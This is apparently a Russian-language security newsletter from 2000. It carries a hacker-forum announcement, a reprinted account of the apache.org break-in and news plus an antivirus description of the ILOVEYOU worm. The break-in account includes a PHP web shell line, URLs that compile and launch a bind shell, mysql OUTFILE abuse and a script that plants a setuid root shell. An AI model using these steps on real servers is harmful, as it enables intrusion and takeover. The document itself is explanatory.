Обзор рынка и комментарии к нему:

Первый украинский международный НACK FORUM

За годы развития информационных технологий на просторах СССР становление и возмужание компьютерной элиты происходило обособлено от всего мира и разобщено внутри страны. К сожалению, эта традиция продолжается и по сей день, как в странах бывшего СССР, так и в странах Европы. Кроме сетей FIDONET и INTERNET не существовало способов общения профессионалов или просто единомышленников. А ведь всем известно, что никакая электронная почта не живого общения, обмена опытом, идеями и мыслями. Даже просто дружеская болтовня на общие увлекательные темы дает много новой информации. Итак, настало время объединиться всем истинным хозяевам информационных сетей и систем, а также желающим влиться в это великое виртуальное братство.

Неправительственная организация "Зеленая Планета" проводит в августе 2000 года в Запорожье (Украина) первый международный форум компьютерного андеграунда.

Девиз форума - "Взлом - путь к защите"

Что такое - HACK FORUM ?

Это - возможность узнать новые эффективные методы и
способы взлома и защиты от него;

Это - возможность лично познакомиться и подружиться,
установить новые контакты с единомышленниками;

Это - реальная возможность организовать собственную
группу или войти в состав уже существующих групп;

Это - шанс, что твоя работа будет оценена и признана
теми, кто действительно понимает, о чем идет речь;

Это - возможность ветеранам информационных войн
поделиться накопленной мудростью с новобранцами;

Это - возможность начинающим постичь многие секреты
мастерства не тратя на это годы.

В конце концов, - это просто возможность весело провести время в хорошей компании!

Цель проведения - HACK FORUM'a

При проведении форума мы не ставим целью научить Вас взламывать все и вся, но мы создаем необходимые благоприятные условия для общения и сотрудничества,
как специалистов-одиночек, так и групп с целью объединить усилия по решению стоящих перед Вами задач и проблем.

ОФИЦИАЛЬНАЯ ПРОГРАММА ВКЛЮЧАЕТ ТРИ ОСНОВНЫХ РАЗДЕЛА:

Безопасность Web-серверов - защита и взлом серверов под *NIX и Windows, основные приемы и методы, нюансы.

Сети под управлением Windows 98/NT/2000 - дырки, средства удаленного управления (BO2K и NetBus), передача информации по протоколу Microsoft TCP/IP.

*NIX - как шлюз Internet-Intranet - Linux & Unix Bugs, программные firewalls.

Как принять участие в HACK FORUM'е

Желающие принять участие в нашем session должны прислать на hack_forum@yahoo.com подтверждение в произвольной форме, с указанием своего Ника или пр., количества участников, страны проживания, возраста и других данных, которые Вы считаете необходимым сообщить :-). Обязательно в subj указать: "ЗАЯВКА".

Если Вы хотите выступить с докладом, обзором, демонстрацией чего-либо :)) или другим сообщением, то в заявке необходимо указать:

1. Тему и краткое содержание (тезисы);
2. Необходимые Вам технические средства для выступления;
3. Приблизительное время выступления.

Мы предлагаем следующую тематику:

- Безопасность Web-серверов - защита и взлом серверов
под *NIX и Windows, основные приемы и методы, нюансы.

- Сети под управлением Windows 98/NT/2000 - дырки,
средства удаленного управления (BO2K и NetBus),
пeредача информации по протоколу Microsoft TCP/IP.

- *NIX - как шлюз Internet-Intranet - Linux & Unix Bugs,
программные firewalls.

Необходимо отметить, что каждый из этих разделов формируется и расширяется при помощи Ваших докладов и выступлений, Вы можете добавить свой раздел. Ждем Ваших предложений на сайте - www.geocities.com/hack_forum/

Заявки принимаются до 15 июня 2000 года.

Источник: Проект - Inroad

Новости:

Подробности взлома APACHE.ORG

ПЕРЕД НАЧАЛОМ ЧТЕНИЯ

Данный документ не содержит в себе сведения о каких-либо новых уязвимостях, атака опиралась на обычные (и не очень) ошибки в конфигурации системы, которые совершает даже команда apache. Это - важно. Учитесь на чужих ошибках, исправляйте их у себя, так что бы это не пришлось делать другим 8)

ВВЕДЕНИЕ

Данный документ описывает как, в течении приблизительно одной недели, был успешно захвачен рутовый доступ к серверу www.apache.org, и была произведена замена логотипа "Powered by Apache" на "Powered by Microsoft BackOffice". Никаких других изменений в системе не производилось, за исключением тех, что были сделаны для предотвращения повторного проникновения в систему посторониих лиц. Мы хотим заметить, что проблемы, описанные в данной бумаге, не относятся к проблемам Apache, это лишь ошибки конфигурации (некоторые из них прямо из BugZilla's README, правда в нe:м содержалось достаточно предупреждений, так что разработчики BugZilla тут не причe:м). Люди, использующие в качестве httpd Apache, не дожны ощущать беспокойства, поскольку атака не была основана на его уязвимостях. Поскольку достаточно много серверов используют программное обеспечение Apache, в случае установки бэкдоров на его сервере, они могли бы быть использованы для получения доступа ко многим системам. Этого не должно было случиться, и поэтому нужно было исправлять ошибки как можно скорее. Естественно, обладая правами рута, атакующие не смогли удержаться от заманчивой идеи замены логотипа.

FTPROOT=WWWROOT, ОТКРЫТЫЕ НА ЗАПИСЬ ПАПКИ

В поисках последней версии веб-сервера apache, для сравнения его с предыдущими и выявлениями новых возможностей переполнения буфера, хакер попал на ftp://ftp.apache.org. Там он обнаружил директории веб-сервера http://www.apache.org, доступные на запись. Таким образом в них был занесe:н файл wuh.php3, включающий

<? passthru($cmd); ?>Команды были исполнены. Что и неудивительно - при наборе из окна браузера

http://www.apache.org/thatdir/wuh.php3?cmd=id

команда id была выполнена. Следующим шагом была подгрузка и компиляция биндшелла, выполненная с помощью http://www.apache.org/thatdir/wuh.php3?cmd=gcc+-o+httpd+httpd.c, запуск которого можно было осуществить потом командой http://www.apache.org/thatdir/wuh.php3?cmd=./httpd.

ШЕЛЛ

Естественно, в качестве шелла использовался биндшелл, который требовал идентификации пользователя с весьма сложным паролем. Далее было произведено соединение на 65533 порт, на который был установлен данный шелл, и хакер получил локальный доступ с правами nobody, так как CGI имеет именно такие права.

ВНУТРИ APACHE.ORG BOX

Внутри были обнаружены доступные на запись и исполнение директории /root
homedirs
apache.org стоит на FreeBSD 3.4. Хакер не хотел использовать какое-либо переполнение буфера или эксплоит, целью было достичь права рута с помощью ошибок конфигурации.

MYSQL

В результате старательного поиска было обнаружено, что mysql работает с правами рута и достигаем локально. Поскольку apache.org работает с bugzilla, которому необходим аккаунт mysql, который содержит в своих исходниках имя пользователя и пароль открытым текстом, было достаточно легко получить пару имя пользователя/пароль для базы данных mysql. Хакер подгрузил nportredird и поставил его на приe:м соединений на порт 23306 со своего IP и передачи их на порт 3306 локального хоста, таким образом предоставив себе возможность пользования собственным клиентом mysql.

ИСПОЛЬЗОВАНИЕ MYSQL ДЛЯ ПОЛУЧЕНИЯ РУТОВСКИХ ПРАВ

Получив доступ к порту 3306 из локального хоста, и используя логин 'bugs' (который по умолчанию имеет полный доступ), возможности хакера мгновенно повысились. Причина сего - невнимательное чтение README-файла Bugzilla, который действительно показывает быстрый способ установки (со всеми Y), но тем не менее содержит множество предупреждений, одно из которых - "не запускайте mysqld под рутом".

Таким образом, используя 'SELECT ... INTO OUTFILE;', хакеру предоставилась возможность создания файлов в любом месте с правами рута. Эти файлы имели доступ 0666, таким образом ничего нельзя было перезаписать, тем не менее, это было явно полезной возможностью. Какая же польза от этого? Бесполезно создавать доступный для записи .rhosts файл, никакой, даже самый сумасшедший демон rshd не подпустит к себе доступный для записи файл .rhosts. К тому же в данном случае rshd просто не было.

СВОЙ /ROOT/.TSHRC

Тут хакер решил применить трояноподобный трюк. Он создал базу данных с одним полем в 80 символов, и после пары insert'ов и одного select'a он получил файл /root/.rhosts приблизительно следующего содержания: #!/bin/sh cp /bin/sh /tmp/.rootsh chmod 4755 /tmp/.rootsh rm -f /root/.tcshrc

*** ROOT!!! ***

Достаточно просто. Осталось только подождать, пока кто-нибудь не выполнит su -. Правда, благодаря тому, что 9 человек легально имеют права рута, это заняло весьма малый промежуток времени. Оставшееся тоже было довольно просто - под правами рута был сделан быстрый дефэйс, но только после того, как был команде apache был предоставлен краткий отчe:т с перечисленными уязвимостями и быстрыми способами их устранения. Через небольшой промежуток времени после дефэйса, этот отчe:т был послан одному из администраторов.

КОРРЕКЦИЯ FTPROOT=WWWROOT

Так же перед дефейсом была создана папка ftproot в корневой директории веб-сервера (которая была и корневой ftp-директорией), и 'dist' была скопирована в 'ftproot/dist', корень ftp-директории сменили на этот новый ftproot, оставив открытые на запись каталоги защищe:нными, но не нарушив нормальной работы ссылок.

КРАТКО ОБ ОШИБКАХ

ftproot=wwwroot, директории с доступом на запись, позволившие подгрузить и выполнить php3 - скрипты, mysqld, работающий под рутом, с полноправным логином без пароля.

ПОСЛЕДСТВИЯ

Возможно внесение бэкдоров в файлы посредством редактирования исходных текстов, что позволило бы нанести ущерб всем пользователям, их скачавшим.
 rchik.

Copyright (C) Team Void

"I love you" создал немецкий студент?

{Фото}

По мнению эксперта из Швеции Фредрика Бьорка, вирус "I love you" запустил немец по имени Михаэль, который учится в одном из университетов Австралии.

Версия о том, что автор вируса - филиппинец, продолжает активно разрабатываться, напоминает телекомпания НТВ. Однако, как считает эксперт по вопросам борьбы с вирусами, филиппинский обратный адрес - это ложный след, специально оставленный злоумышленником. Немецкий хакер разослал вирус с одного из филиппинских адресов в Интернете, что совершенно не означает, что он и сам там физически находился.

Бьорк сообщил, что ему удалось выйти на след студента уже спустя три часа после поступления первых сообщений о появлении вируса по следам, оставленным Михаэлем в конференциях Usenet. В прошлом году Бьорку в составе группы ученых уже удалось обнаружить автора вируса "Melissa".

Многие шведские компьютерные эксперты весьма сдержано прореагировали на заявление своего коллеги, сообщает РБК.

В настоящее время известно девять версий вируса - если первая маскировалась под любовное послание, то новые имитируют присланные по почте шутки, приглашение на чашку кофе и счет за подарки, заказанные к празднику. Последний вариант оказался самым опасным - кроме графической и звуковой информации он уничтожает файлы с помощью которых запускается компьютер.

Copyright (C) Lenta.ru

В создании вируса "Love Bug" подозревают молодого филлипинца

Как сообщает агентство Reuters, вирус "Love Bug", распространившийся по компьютерным системам всего мира, имеет филлипинское происхождение, а его автором может быть молодой человек, проживающий в окресностях Манилы. Так считает полиция и местные Internet-компании. Расследованием дела занимается ФБР.

Манильские Internet-провайдеры полагают, что вирус начал распространяться с двух адресов электронной почты - 'spyder+super.net.ph' и 'mailme+super.net.ph'. Об этом рассказали владельцы сети Supernet. Подозреваемому 23 года. Живет он в пригороде Манилы. Полиция пока отказывается комментировать ход расследования. Известно лишь, что это не первые попытки хакера проявить свое "творчество". Ранее он уже пытался проникнуть на защищенные серверы некоторых компаний.

ФБР и Интерпол тщательно изучают все данные по вирусу "Love Bug" ("ILOVEYOU"). Сообщается, что распространяются и другие варианты этого вируса. Один из них содержит в теме "Susitikim shi vakara kavas puodukui...," что означает по-литовски: "Давайте встретимся сегодня вечером за чашечкой кофе...". Литовские власти заявили, что уже занимаются расследованием происхождения вируса.

Copyright (C) InfoArt News Agency

Пентагон сообщил, что ущерб от вируса "Love Bug" минимален

По сообщениям западных информационных агентств, вирус "Love Bug" (VBS.LoveYouWorm) поразил как минимум четыре военных компьютерных системы, но в проблема была быстро локализована, и ущерб оказался минимальным.

Одной из пораженных систем, по данным Reuters, оказалась сверхсекретная компьютерная система Агентства национальной безопасности США (National Security Agency), обрабатывающая информацию, которая собирается спутниками-шпионами из разных регионов мира. Вирус распространился лишь на 1% компьютерной сети + сотрудникам удалось быстро изолировать и удалить его.

Copyright (C) InfoArt News Agency

"ДиалогНаука" выпускает дополнение к Doctor Web для борьбы с вирусом VBS.LoveLetter (или VBS.LoveYouWorm)

В четверг появилась новая вирусная программа-червь, быстро распространившаяся через Internet по всему миру. После анализа полученных образцов вирусов в тот же день было выпущено дополнение к вирусной базе программы Doctor Web. Это дополнение свободно доступно на серверах ДиалогНауки.

Пользователям программы Doctor Web для Windows 95/98/NT достаточно нажать кнопку "Обновить через Internet" в основном окне программы, чтобы подключить это дополнение к вирусной базе установленного на их компьютере Doctor Web.

Первоначально вирусу дали название VBS.LoveYouWorm, однако впоследствии оно было изменено на общепринятое в настоящее время VBS.LoveLetter.

Данный вирус распространяется с сообщениями электронной почты и по каналам IRC. Письмо с вирусом легко выделить. Тема письма - "ILOVEYOU", что сразу же бросается в глаза. В самом письме содержится текст "kindly check the attached LOVELETTER coming from me" и присоединенный файл с именем "LOVE-LETTER-FOR-YOU.TXT.vbs". Вирус срабатывает только в том случае, если пользователь откроет этот присоединенный файл.

Вирус рассылает себя по всем адресам, которые найдет в адресной книге почтовой программы MS Outlook инфицированного компьютера, а также записывает свои копии в файлы на жестком диске (необратимо затирая тем самым их оригинальное содержание). Жертвами вируса в частности являются картинки в формате JPEG, программы Java Script и Visual Basic Script и целый ряд других файлов. Также вирус "прячет" видео- и музыкальные файлы в формате MP2 и MP3.

Кроме этого, вирус совершает несколько действий по инсталляции себя в систему и по установке некоторых дополнительных вирусных модулей, которые сам перекачивает из Internet.

Все это говорит о том, что вирус VBS.LoveLetter - очень опасен! Кроме прямой порчи данных и нарушения целостности защиты операционной системы, вирус рассылает большое количество сообщений - своих копий - что загружает компьютерные сети и серверы электронной почты. В ряде случаев вирус парализовал работу целых офисов.

Эпидемия этого вируса подтвердила, что следование простым правилам позволит избежать опасности, которую представляют собой компьютерные вирусы и троянские программы. В частности, нужно очень осторожно относиться к файлам, полученным из неизвестных источников.

Описание вируса "VBS.LoveLetter"

Вирус VBS.LoveLetter представляет собой командный файл (скрипт), написанный на языке VBS (Visual Basic Script) и способный рассылать свои копии по электронной почте и через IRC. Основной канал распространения - электронная почта.

Вирус рассылает свои копии в виде сообщений электронной почты. Характерные признаки генерируемых вирусом писем следующие:

- Поле темы письма (subject): "ILOVEYOU";
- Текст в теле письма: "kindly check the attached LOVELETTER coming from me";
- Присоединенный к письму файл: "LOVE-LETTER-FOR-YOU.TXT.vbs".

Вирус не может самостоятельно активизироваться при просмотре письма в почтовом клиенте, но ряд моментов провоцирует пользователя-получателя открыть присоединенный к письму файл, и, тем самым, активировать содержащийся там вирус. Тема письма "ILOVEYOU" уже привлекает внимание.

Поскольку вирус рассылает себя по адресам, которые он находит в адресной книге инфицированного компьютера, в поле адреса отправителя письма зачастую оказывается адрес какого-нибудь хорошего знакомого. Кроме того, при стандартных настройках Windows (не показывать расширения для зарегистрированных типов файлов) расширение ".vbs" вирусного модуля может не отображаться почтовым клиентом, и вложенный в письмо вирусный VBS-скрипт будет показан просто как безобидный на первый взгляд "LOVE-LETTER-FOR-YOU.TXT".

При открытии этого присоединенного к письму файла вирус активируется. При этом он:

1) Создает свои копии в системном и основном каталоге Windows:

- в системный каталог вирус записывает две копии под именами "MSKernel32.vbs" и "LOVE-LETTER-FOR-YOU.TXT.vbs", соответственно;
- в основной каталог Windows - одну, под именем "Win32DLL.vbs".

Кроме того, регистрируется автозапуск вируса при старте Windows:

- запуск "MSKernel32.vbs" прописывается в ключе реестра:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows
\CurrentVersion\Run\MSKernel32;

- запуск Win32DLL.vbs прописывается в ключе реестра:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows
\CurrentVersion\RunServices\Win32DLL

2) Рассылает свои копии по электронной почте, используя _все_ почтовые адреса из местной адресной книги MS Outlook. Рассылка, разумеется, идет от имени пользователя данной системы.

3) Проверяет наличие в системном каталоге Windows некоего файла WINFAT32.EXE и, в случае обнаружения такового, предпринимает ряд шагов для:

- загрузки с некоторого адреса в Internet файла "WIN-BUGSFIX.EXE";
- запуска этого файла "WIN-BUGSFIX.EXE".

(Смысл этих действий пока не ясен, т.к. на данный момент не удалось обнаружить ни одного образца WIN-BUGSFIX.EXE. Во всяком случае все четыре заложенные в вирусе адреса Internet для его загрузки уже не существуют, сообщает ДиалогНаука).

4) Вирус сканирует все доступные на компьютере-жертве диски и записывает свои копии во все файлы с расширениями ".jpg", ".jpeg", ".js", ".css", ".vbs", ".vbe", ".jse", ".wsh", ".sct" и ".hta". Оригинальное содержание таких файлов необратимо затирается вирусным кодом. Все такие файлы кроме того переименовываются, получая расширение ".vbs" (за исключением тех, которые имели расширение ".vbs" или ".vbe" изначально). Кроме этого, вирус ищет файлы с расширениями ".mp2" и ".mp3", но не затирает их, а создает файлы с такими же именами, но с расширениями ".vbs", записывает в эти файлы свой код, а оригинальным файлам ставит атрибут "hidden" (скрытый).

5) Вирус создает в системном каталоге Windows так называемый "дроппер" (инсталлятор вируса) в формате HTML под именем "LOVE-LETTER-FOR-YOU.HTM" и затем пытается обнаружить установленный клиент для IRC (конкретно говоря - популярный пакет mIRC). В случае успеха вирус создает конфигурационный файл SCRIPT.INI, который настраивает mIRC на автоматическую рассылку "LOVE-LETTER-FOR-YOU.HTM" пользователям тех каналов IRC, к которым попытается подключиться данная инфицированная система. Открытие файла "LOVE-LETTER-FOR-YOU.HTM" в броузере приводит к установке копии вирусного скрипта "MSKERNEL32.VBS" в систему.

Copyright (C) InfoArt News Agency

Cпонсор рассылки: "ПСИ-КОРПУС" - ПОРТАЛ ПСИХОЛОГИИ НА КУЛИЧКАХ

Обновлен сервер "Проекта - Inroad"

Новая статья:
Выход из кризисных ситуаций

Последние новости
Cкоро будут на www.inroad.kiev.ua :-)

Весь архив рассылки на CityCat

 

Беспроводный доступ в Интернет
предоставлен  фирмой  InterStrada